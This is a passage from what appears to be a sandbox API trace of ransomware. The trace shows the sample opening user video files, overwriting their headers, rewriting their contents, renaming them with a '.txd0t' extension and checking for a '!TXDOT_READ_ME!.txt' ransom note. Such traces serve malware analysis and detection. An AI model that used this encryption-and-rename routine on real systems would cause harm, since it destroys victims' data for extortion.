"c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\6hali.avi.txd0t")) returned 1 [0076.459] SetEvent (hEvent=0x3f8) returned 1 [0076.459] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.460] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4" [0076.460] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4.txd0t" [0076.460] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4.txd0t") returned 0 [0076.460] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4", dwFileAttributes=0x80) returned 1 [0076.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\8ar-oz.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0076.460] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=99721) returned 1 [0076.460] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.460] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.461] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe7877, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.461] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x18580, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x18580, lpOverlapped=0x0) returned 1 [0076.463] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe7a80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.463] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x18580, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x18580, lpOverlapped=0x0) returned 1 [0076.464] FlushFileBuffers (hFile=0x460) returned 1 [0076.466] GetProcessHeap () returned 0xe30000 [0076.466] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x124) returned 0xe9b648 [0076.466] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4" [0076.466] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4") returned="8aR-oZ.mp4" [0076.466] StrCpyW (in: psz1=0xe9b6b0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.466] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt") returned 1 [0076.466] GetProcessHeap () returned 0xe30000 [0076.466] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.466] CloseHandle (hObject=0x460) returned 1 [0076.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\8ar-oz.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\8ar-oz.mp4.txd0t")) returned 1 [0076.469] SetEvent (hEvent=0x3f8) returned 1 [0076.469] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.470] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf" [0076.470] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf.txd0t" [0076.470] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf.txd0t") returned 0 [0076.470] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf", dwFileAttributes=0x80) returned 1 [0076.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\hrfhhxednxcx.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0076.471] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=20789) returned 1 [0076.471] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.471] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.472] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffaccb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.472] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x5130, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x5130, lpOverlapped=0x0) returned 1 [0076.472] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffaed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.472] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x5130, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x5130, lpOverlapped=0x0) returned 1 [0076.472] FlushFileBuffers (hFile=0x460) returned 1 [0076.474] GetProcessHeap () returned 0xe30000 [0076.474] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x130) returned 0xe9b648 [0076.474] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf" [0076.474] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf") returned="hrFHHxEDNXCX.swf" [0076.474] StrCpyW (in: psz1=0xe9b6b0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.474] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt") returned 1 [0076.474] GetProcessHeap () returned 0xe30000 [0076.474] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.474] CloseHandle (hObject=0x460) returned 1 [0076.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\hrfhhxednxcx.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\hrfhhxednxcx.swf.txd0t")) returned 1 [0076.476] SetEvent (hEvent=0x3f8) returned 1 [0076.476] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.477] StrCpyW (in: psz1=0x37ff460, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4" [0076.477] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4.txd0t" [0076.477] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4.txd0t") returned 0 [0076.477] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4", dwFileAttributes=0x80) returned 1 [0076.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\p6ntf9p_sziw.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0076.477] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=73604) returned 1 [0076.478] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.478] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.479] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffede7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.479] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11f80, lpNumberOfBytesRead=0x37ff420, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff420*=0x11f80, lpOverlapped=0x0) returned 1 [0076.480] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffee080, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.480] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11f80, lpNumberOfBytesWritten=0x37ff424, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff424*=0x11f80, lpOverlapped=0x0) returned 1 [0076.480] FlushFileBuffers (hFile=0x460) returned 1 [0076.482] GetProcessHeap () returned 0xe30000 [0076.482] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x130) returned 0xe9b648 [0076.482] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4" [0076.482] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4") returned="P6NtF9p_sziw.mp4" [0076.482] StrCpyW (in: psz1=0xe9b6b0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.482] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt") returned 1 [0076.482] GetProcessHeap () returned 0xe30000 [0076.483] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.483] CloseHandle (hObject=0x460) returned 1 [0076.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\p6ntf9p_sziw.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\p6ntf9p_sziw.mp4.txd0t")) returned 1 [0076.761] SetEvent (hEvent=0x3f8) returned 1 [0076.761] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.762] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi" [0076.763] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi.txd0t" [0076.763] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi.txd0t") returned 0 [0076.763] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi", dwFileAttributes=0x80) returned 1 [0076.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi" (normalized: "c:\\users\\fd1hvy\\videos\\e7c5rm59mt0up_9f.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.763] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=72195) returned 1 [0076.763] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.763] WriteFile (in: hFile=0x46c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.764] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffee3fd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.764] ReadFile (in: hFile=0x46c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x11a00, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x11a00, lpOverlapped=0x0) returned 1 [0076.766] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffee600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.766] WriteFile (in: hFile=0x46c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x11a00, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x11a00, lpOverlapped=0x0) returned 1 [0076.767] FlushFileBuffers (hFile=0x46c) returned 1 [0076.773] GetProcessHeap () returned 0xe30000 [0076.773] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0076.773] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi" [0076.773] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi") returned="e7C5rm59mT0uP_9f.avi" [0076.773] StrCpyW (in: psz1=0xe9d786, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.773] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt") returned 1 [0076.773] GetProcessHeap () returned 0xe30000 [0076.773] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0076.773] CloseHandle (hObject=0x46c) returned 1 [0076.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi" (normalized: "c:\\users\\fd1hvy\\videos\\e7c5rm59mt0up_9f.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\e7c5rm59mt0up_9f.avi.txd0t")) returned 1 [0076.776] SetEvent (hEvent=0x3f8) returned 1 [0076.776] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.777] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv" [0076.777] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv.txd0t" [0076.777] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv.txd0t") returned 0 [0076.777] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv", dwFileAttributes=0x80) returned 1 [0076.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv" (normalized: "c:\\users\\fd1hvy\\videos\\gpsxouaw.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.778] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=38950) returned 1 [0076.778] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.778] WriteFile (in: hFile=0x46c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.779] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff65da, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.779] ReadFile (in: hFile=0x46c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x9820, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x9820, lpOverlapped=0x0) returned 1 [0076.780] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff67e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.780] WriteFile (in: hFile=0x46c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x9820, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x9820, lpOverlapped=0x0) returned 1 [0076.780] FlushFileBuffers (hFile=0x46c) returned 1 [0076.782] GetProcessHeap () returned 0xe30000 [0076.782] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0076.782] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv" [0076.782] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv") returned="gPsXouAw.flv" [0076.782] StrCpyW (in: psz1=0xe9d786, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.782] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt") returned 1 [0076.782] GetProcessHeap () returned 0xe30000 [0076.783] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0076.783] CloseHandle (hObject=0x46c) returned 1 [0076.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv" (normalized: "c:\\users\\fd1hvy\\videos\\gpsxouaw.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\gpsxouaw.flv.txd0t")) returned 1 [0076.785] SetEvent (hEvent=0x3f8) returned 1 [0076.785] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.786] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4" [0076.786] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4.txd0t" [0076.786] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4.txd0t") returned 0 [0076.787] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4", dwFileAttributes=0x80) returned 1 [0076.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\gsxmioztesvb3cy.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.787] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=85865) returned 1 [0076.787] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.787] WriteFile (in: hFile=0x46c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.788] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffeae97, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.788] ReadFile (in: hFile=0x46c, 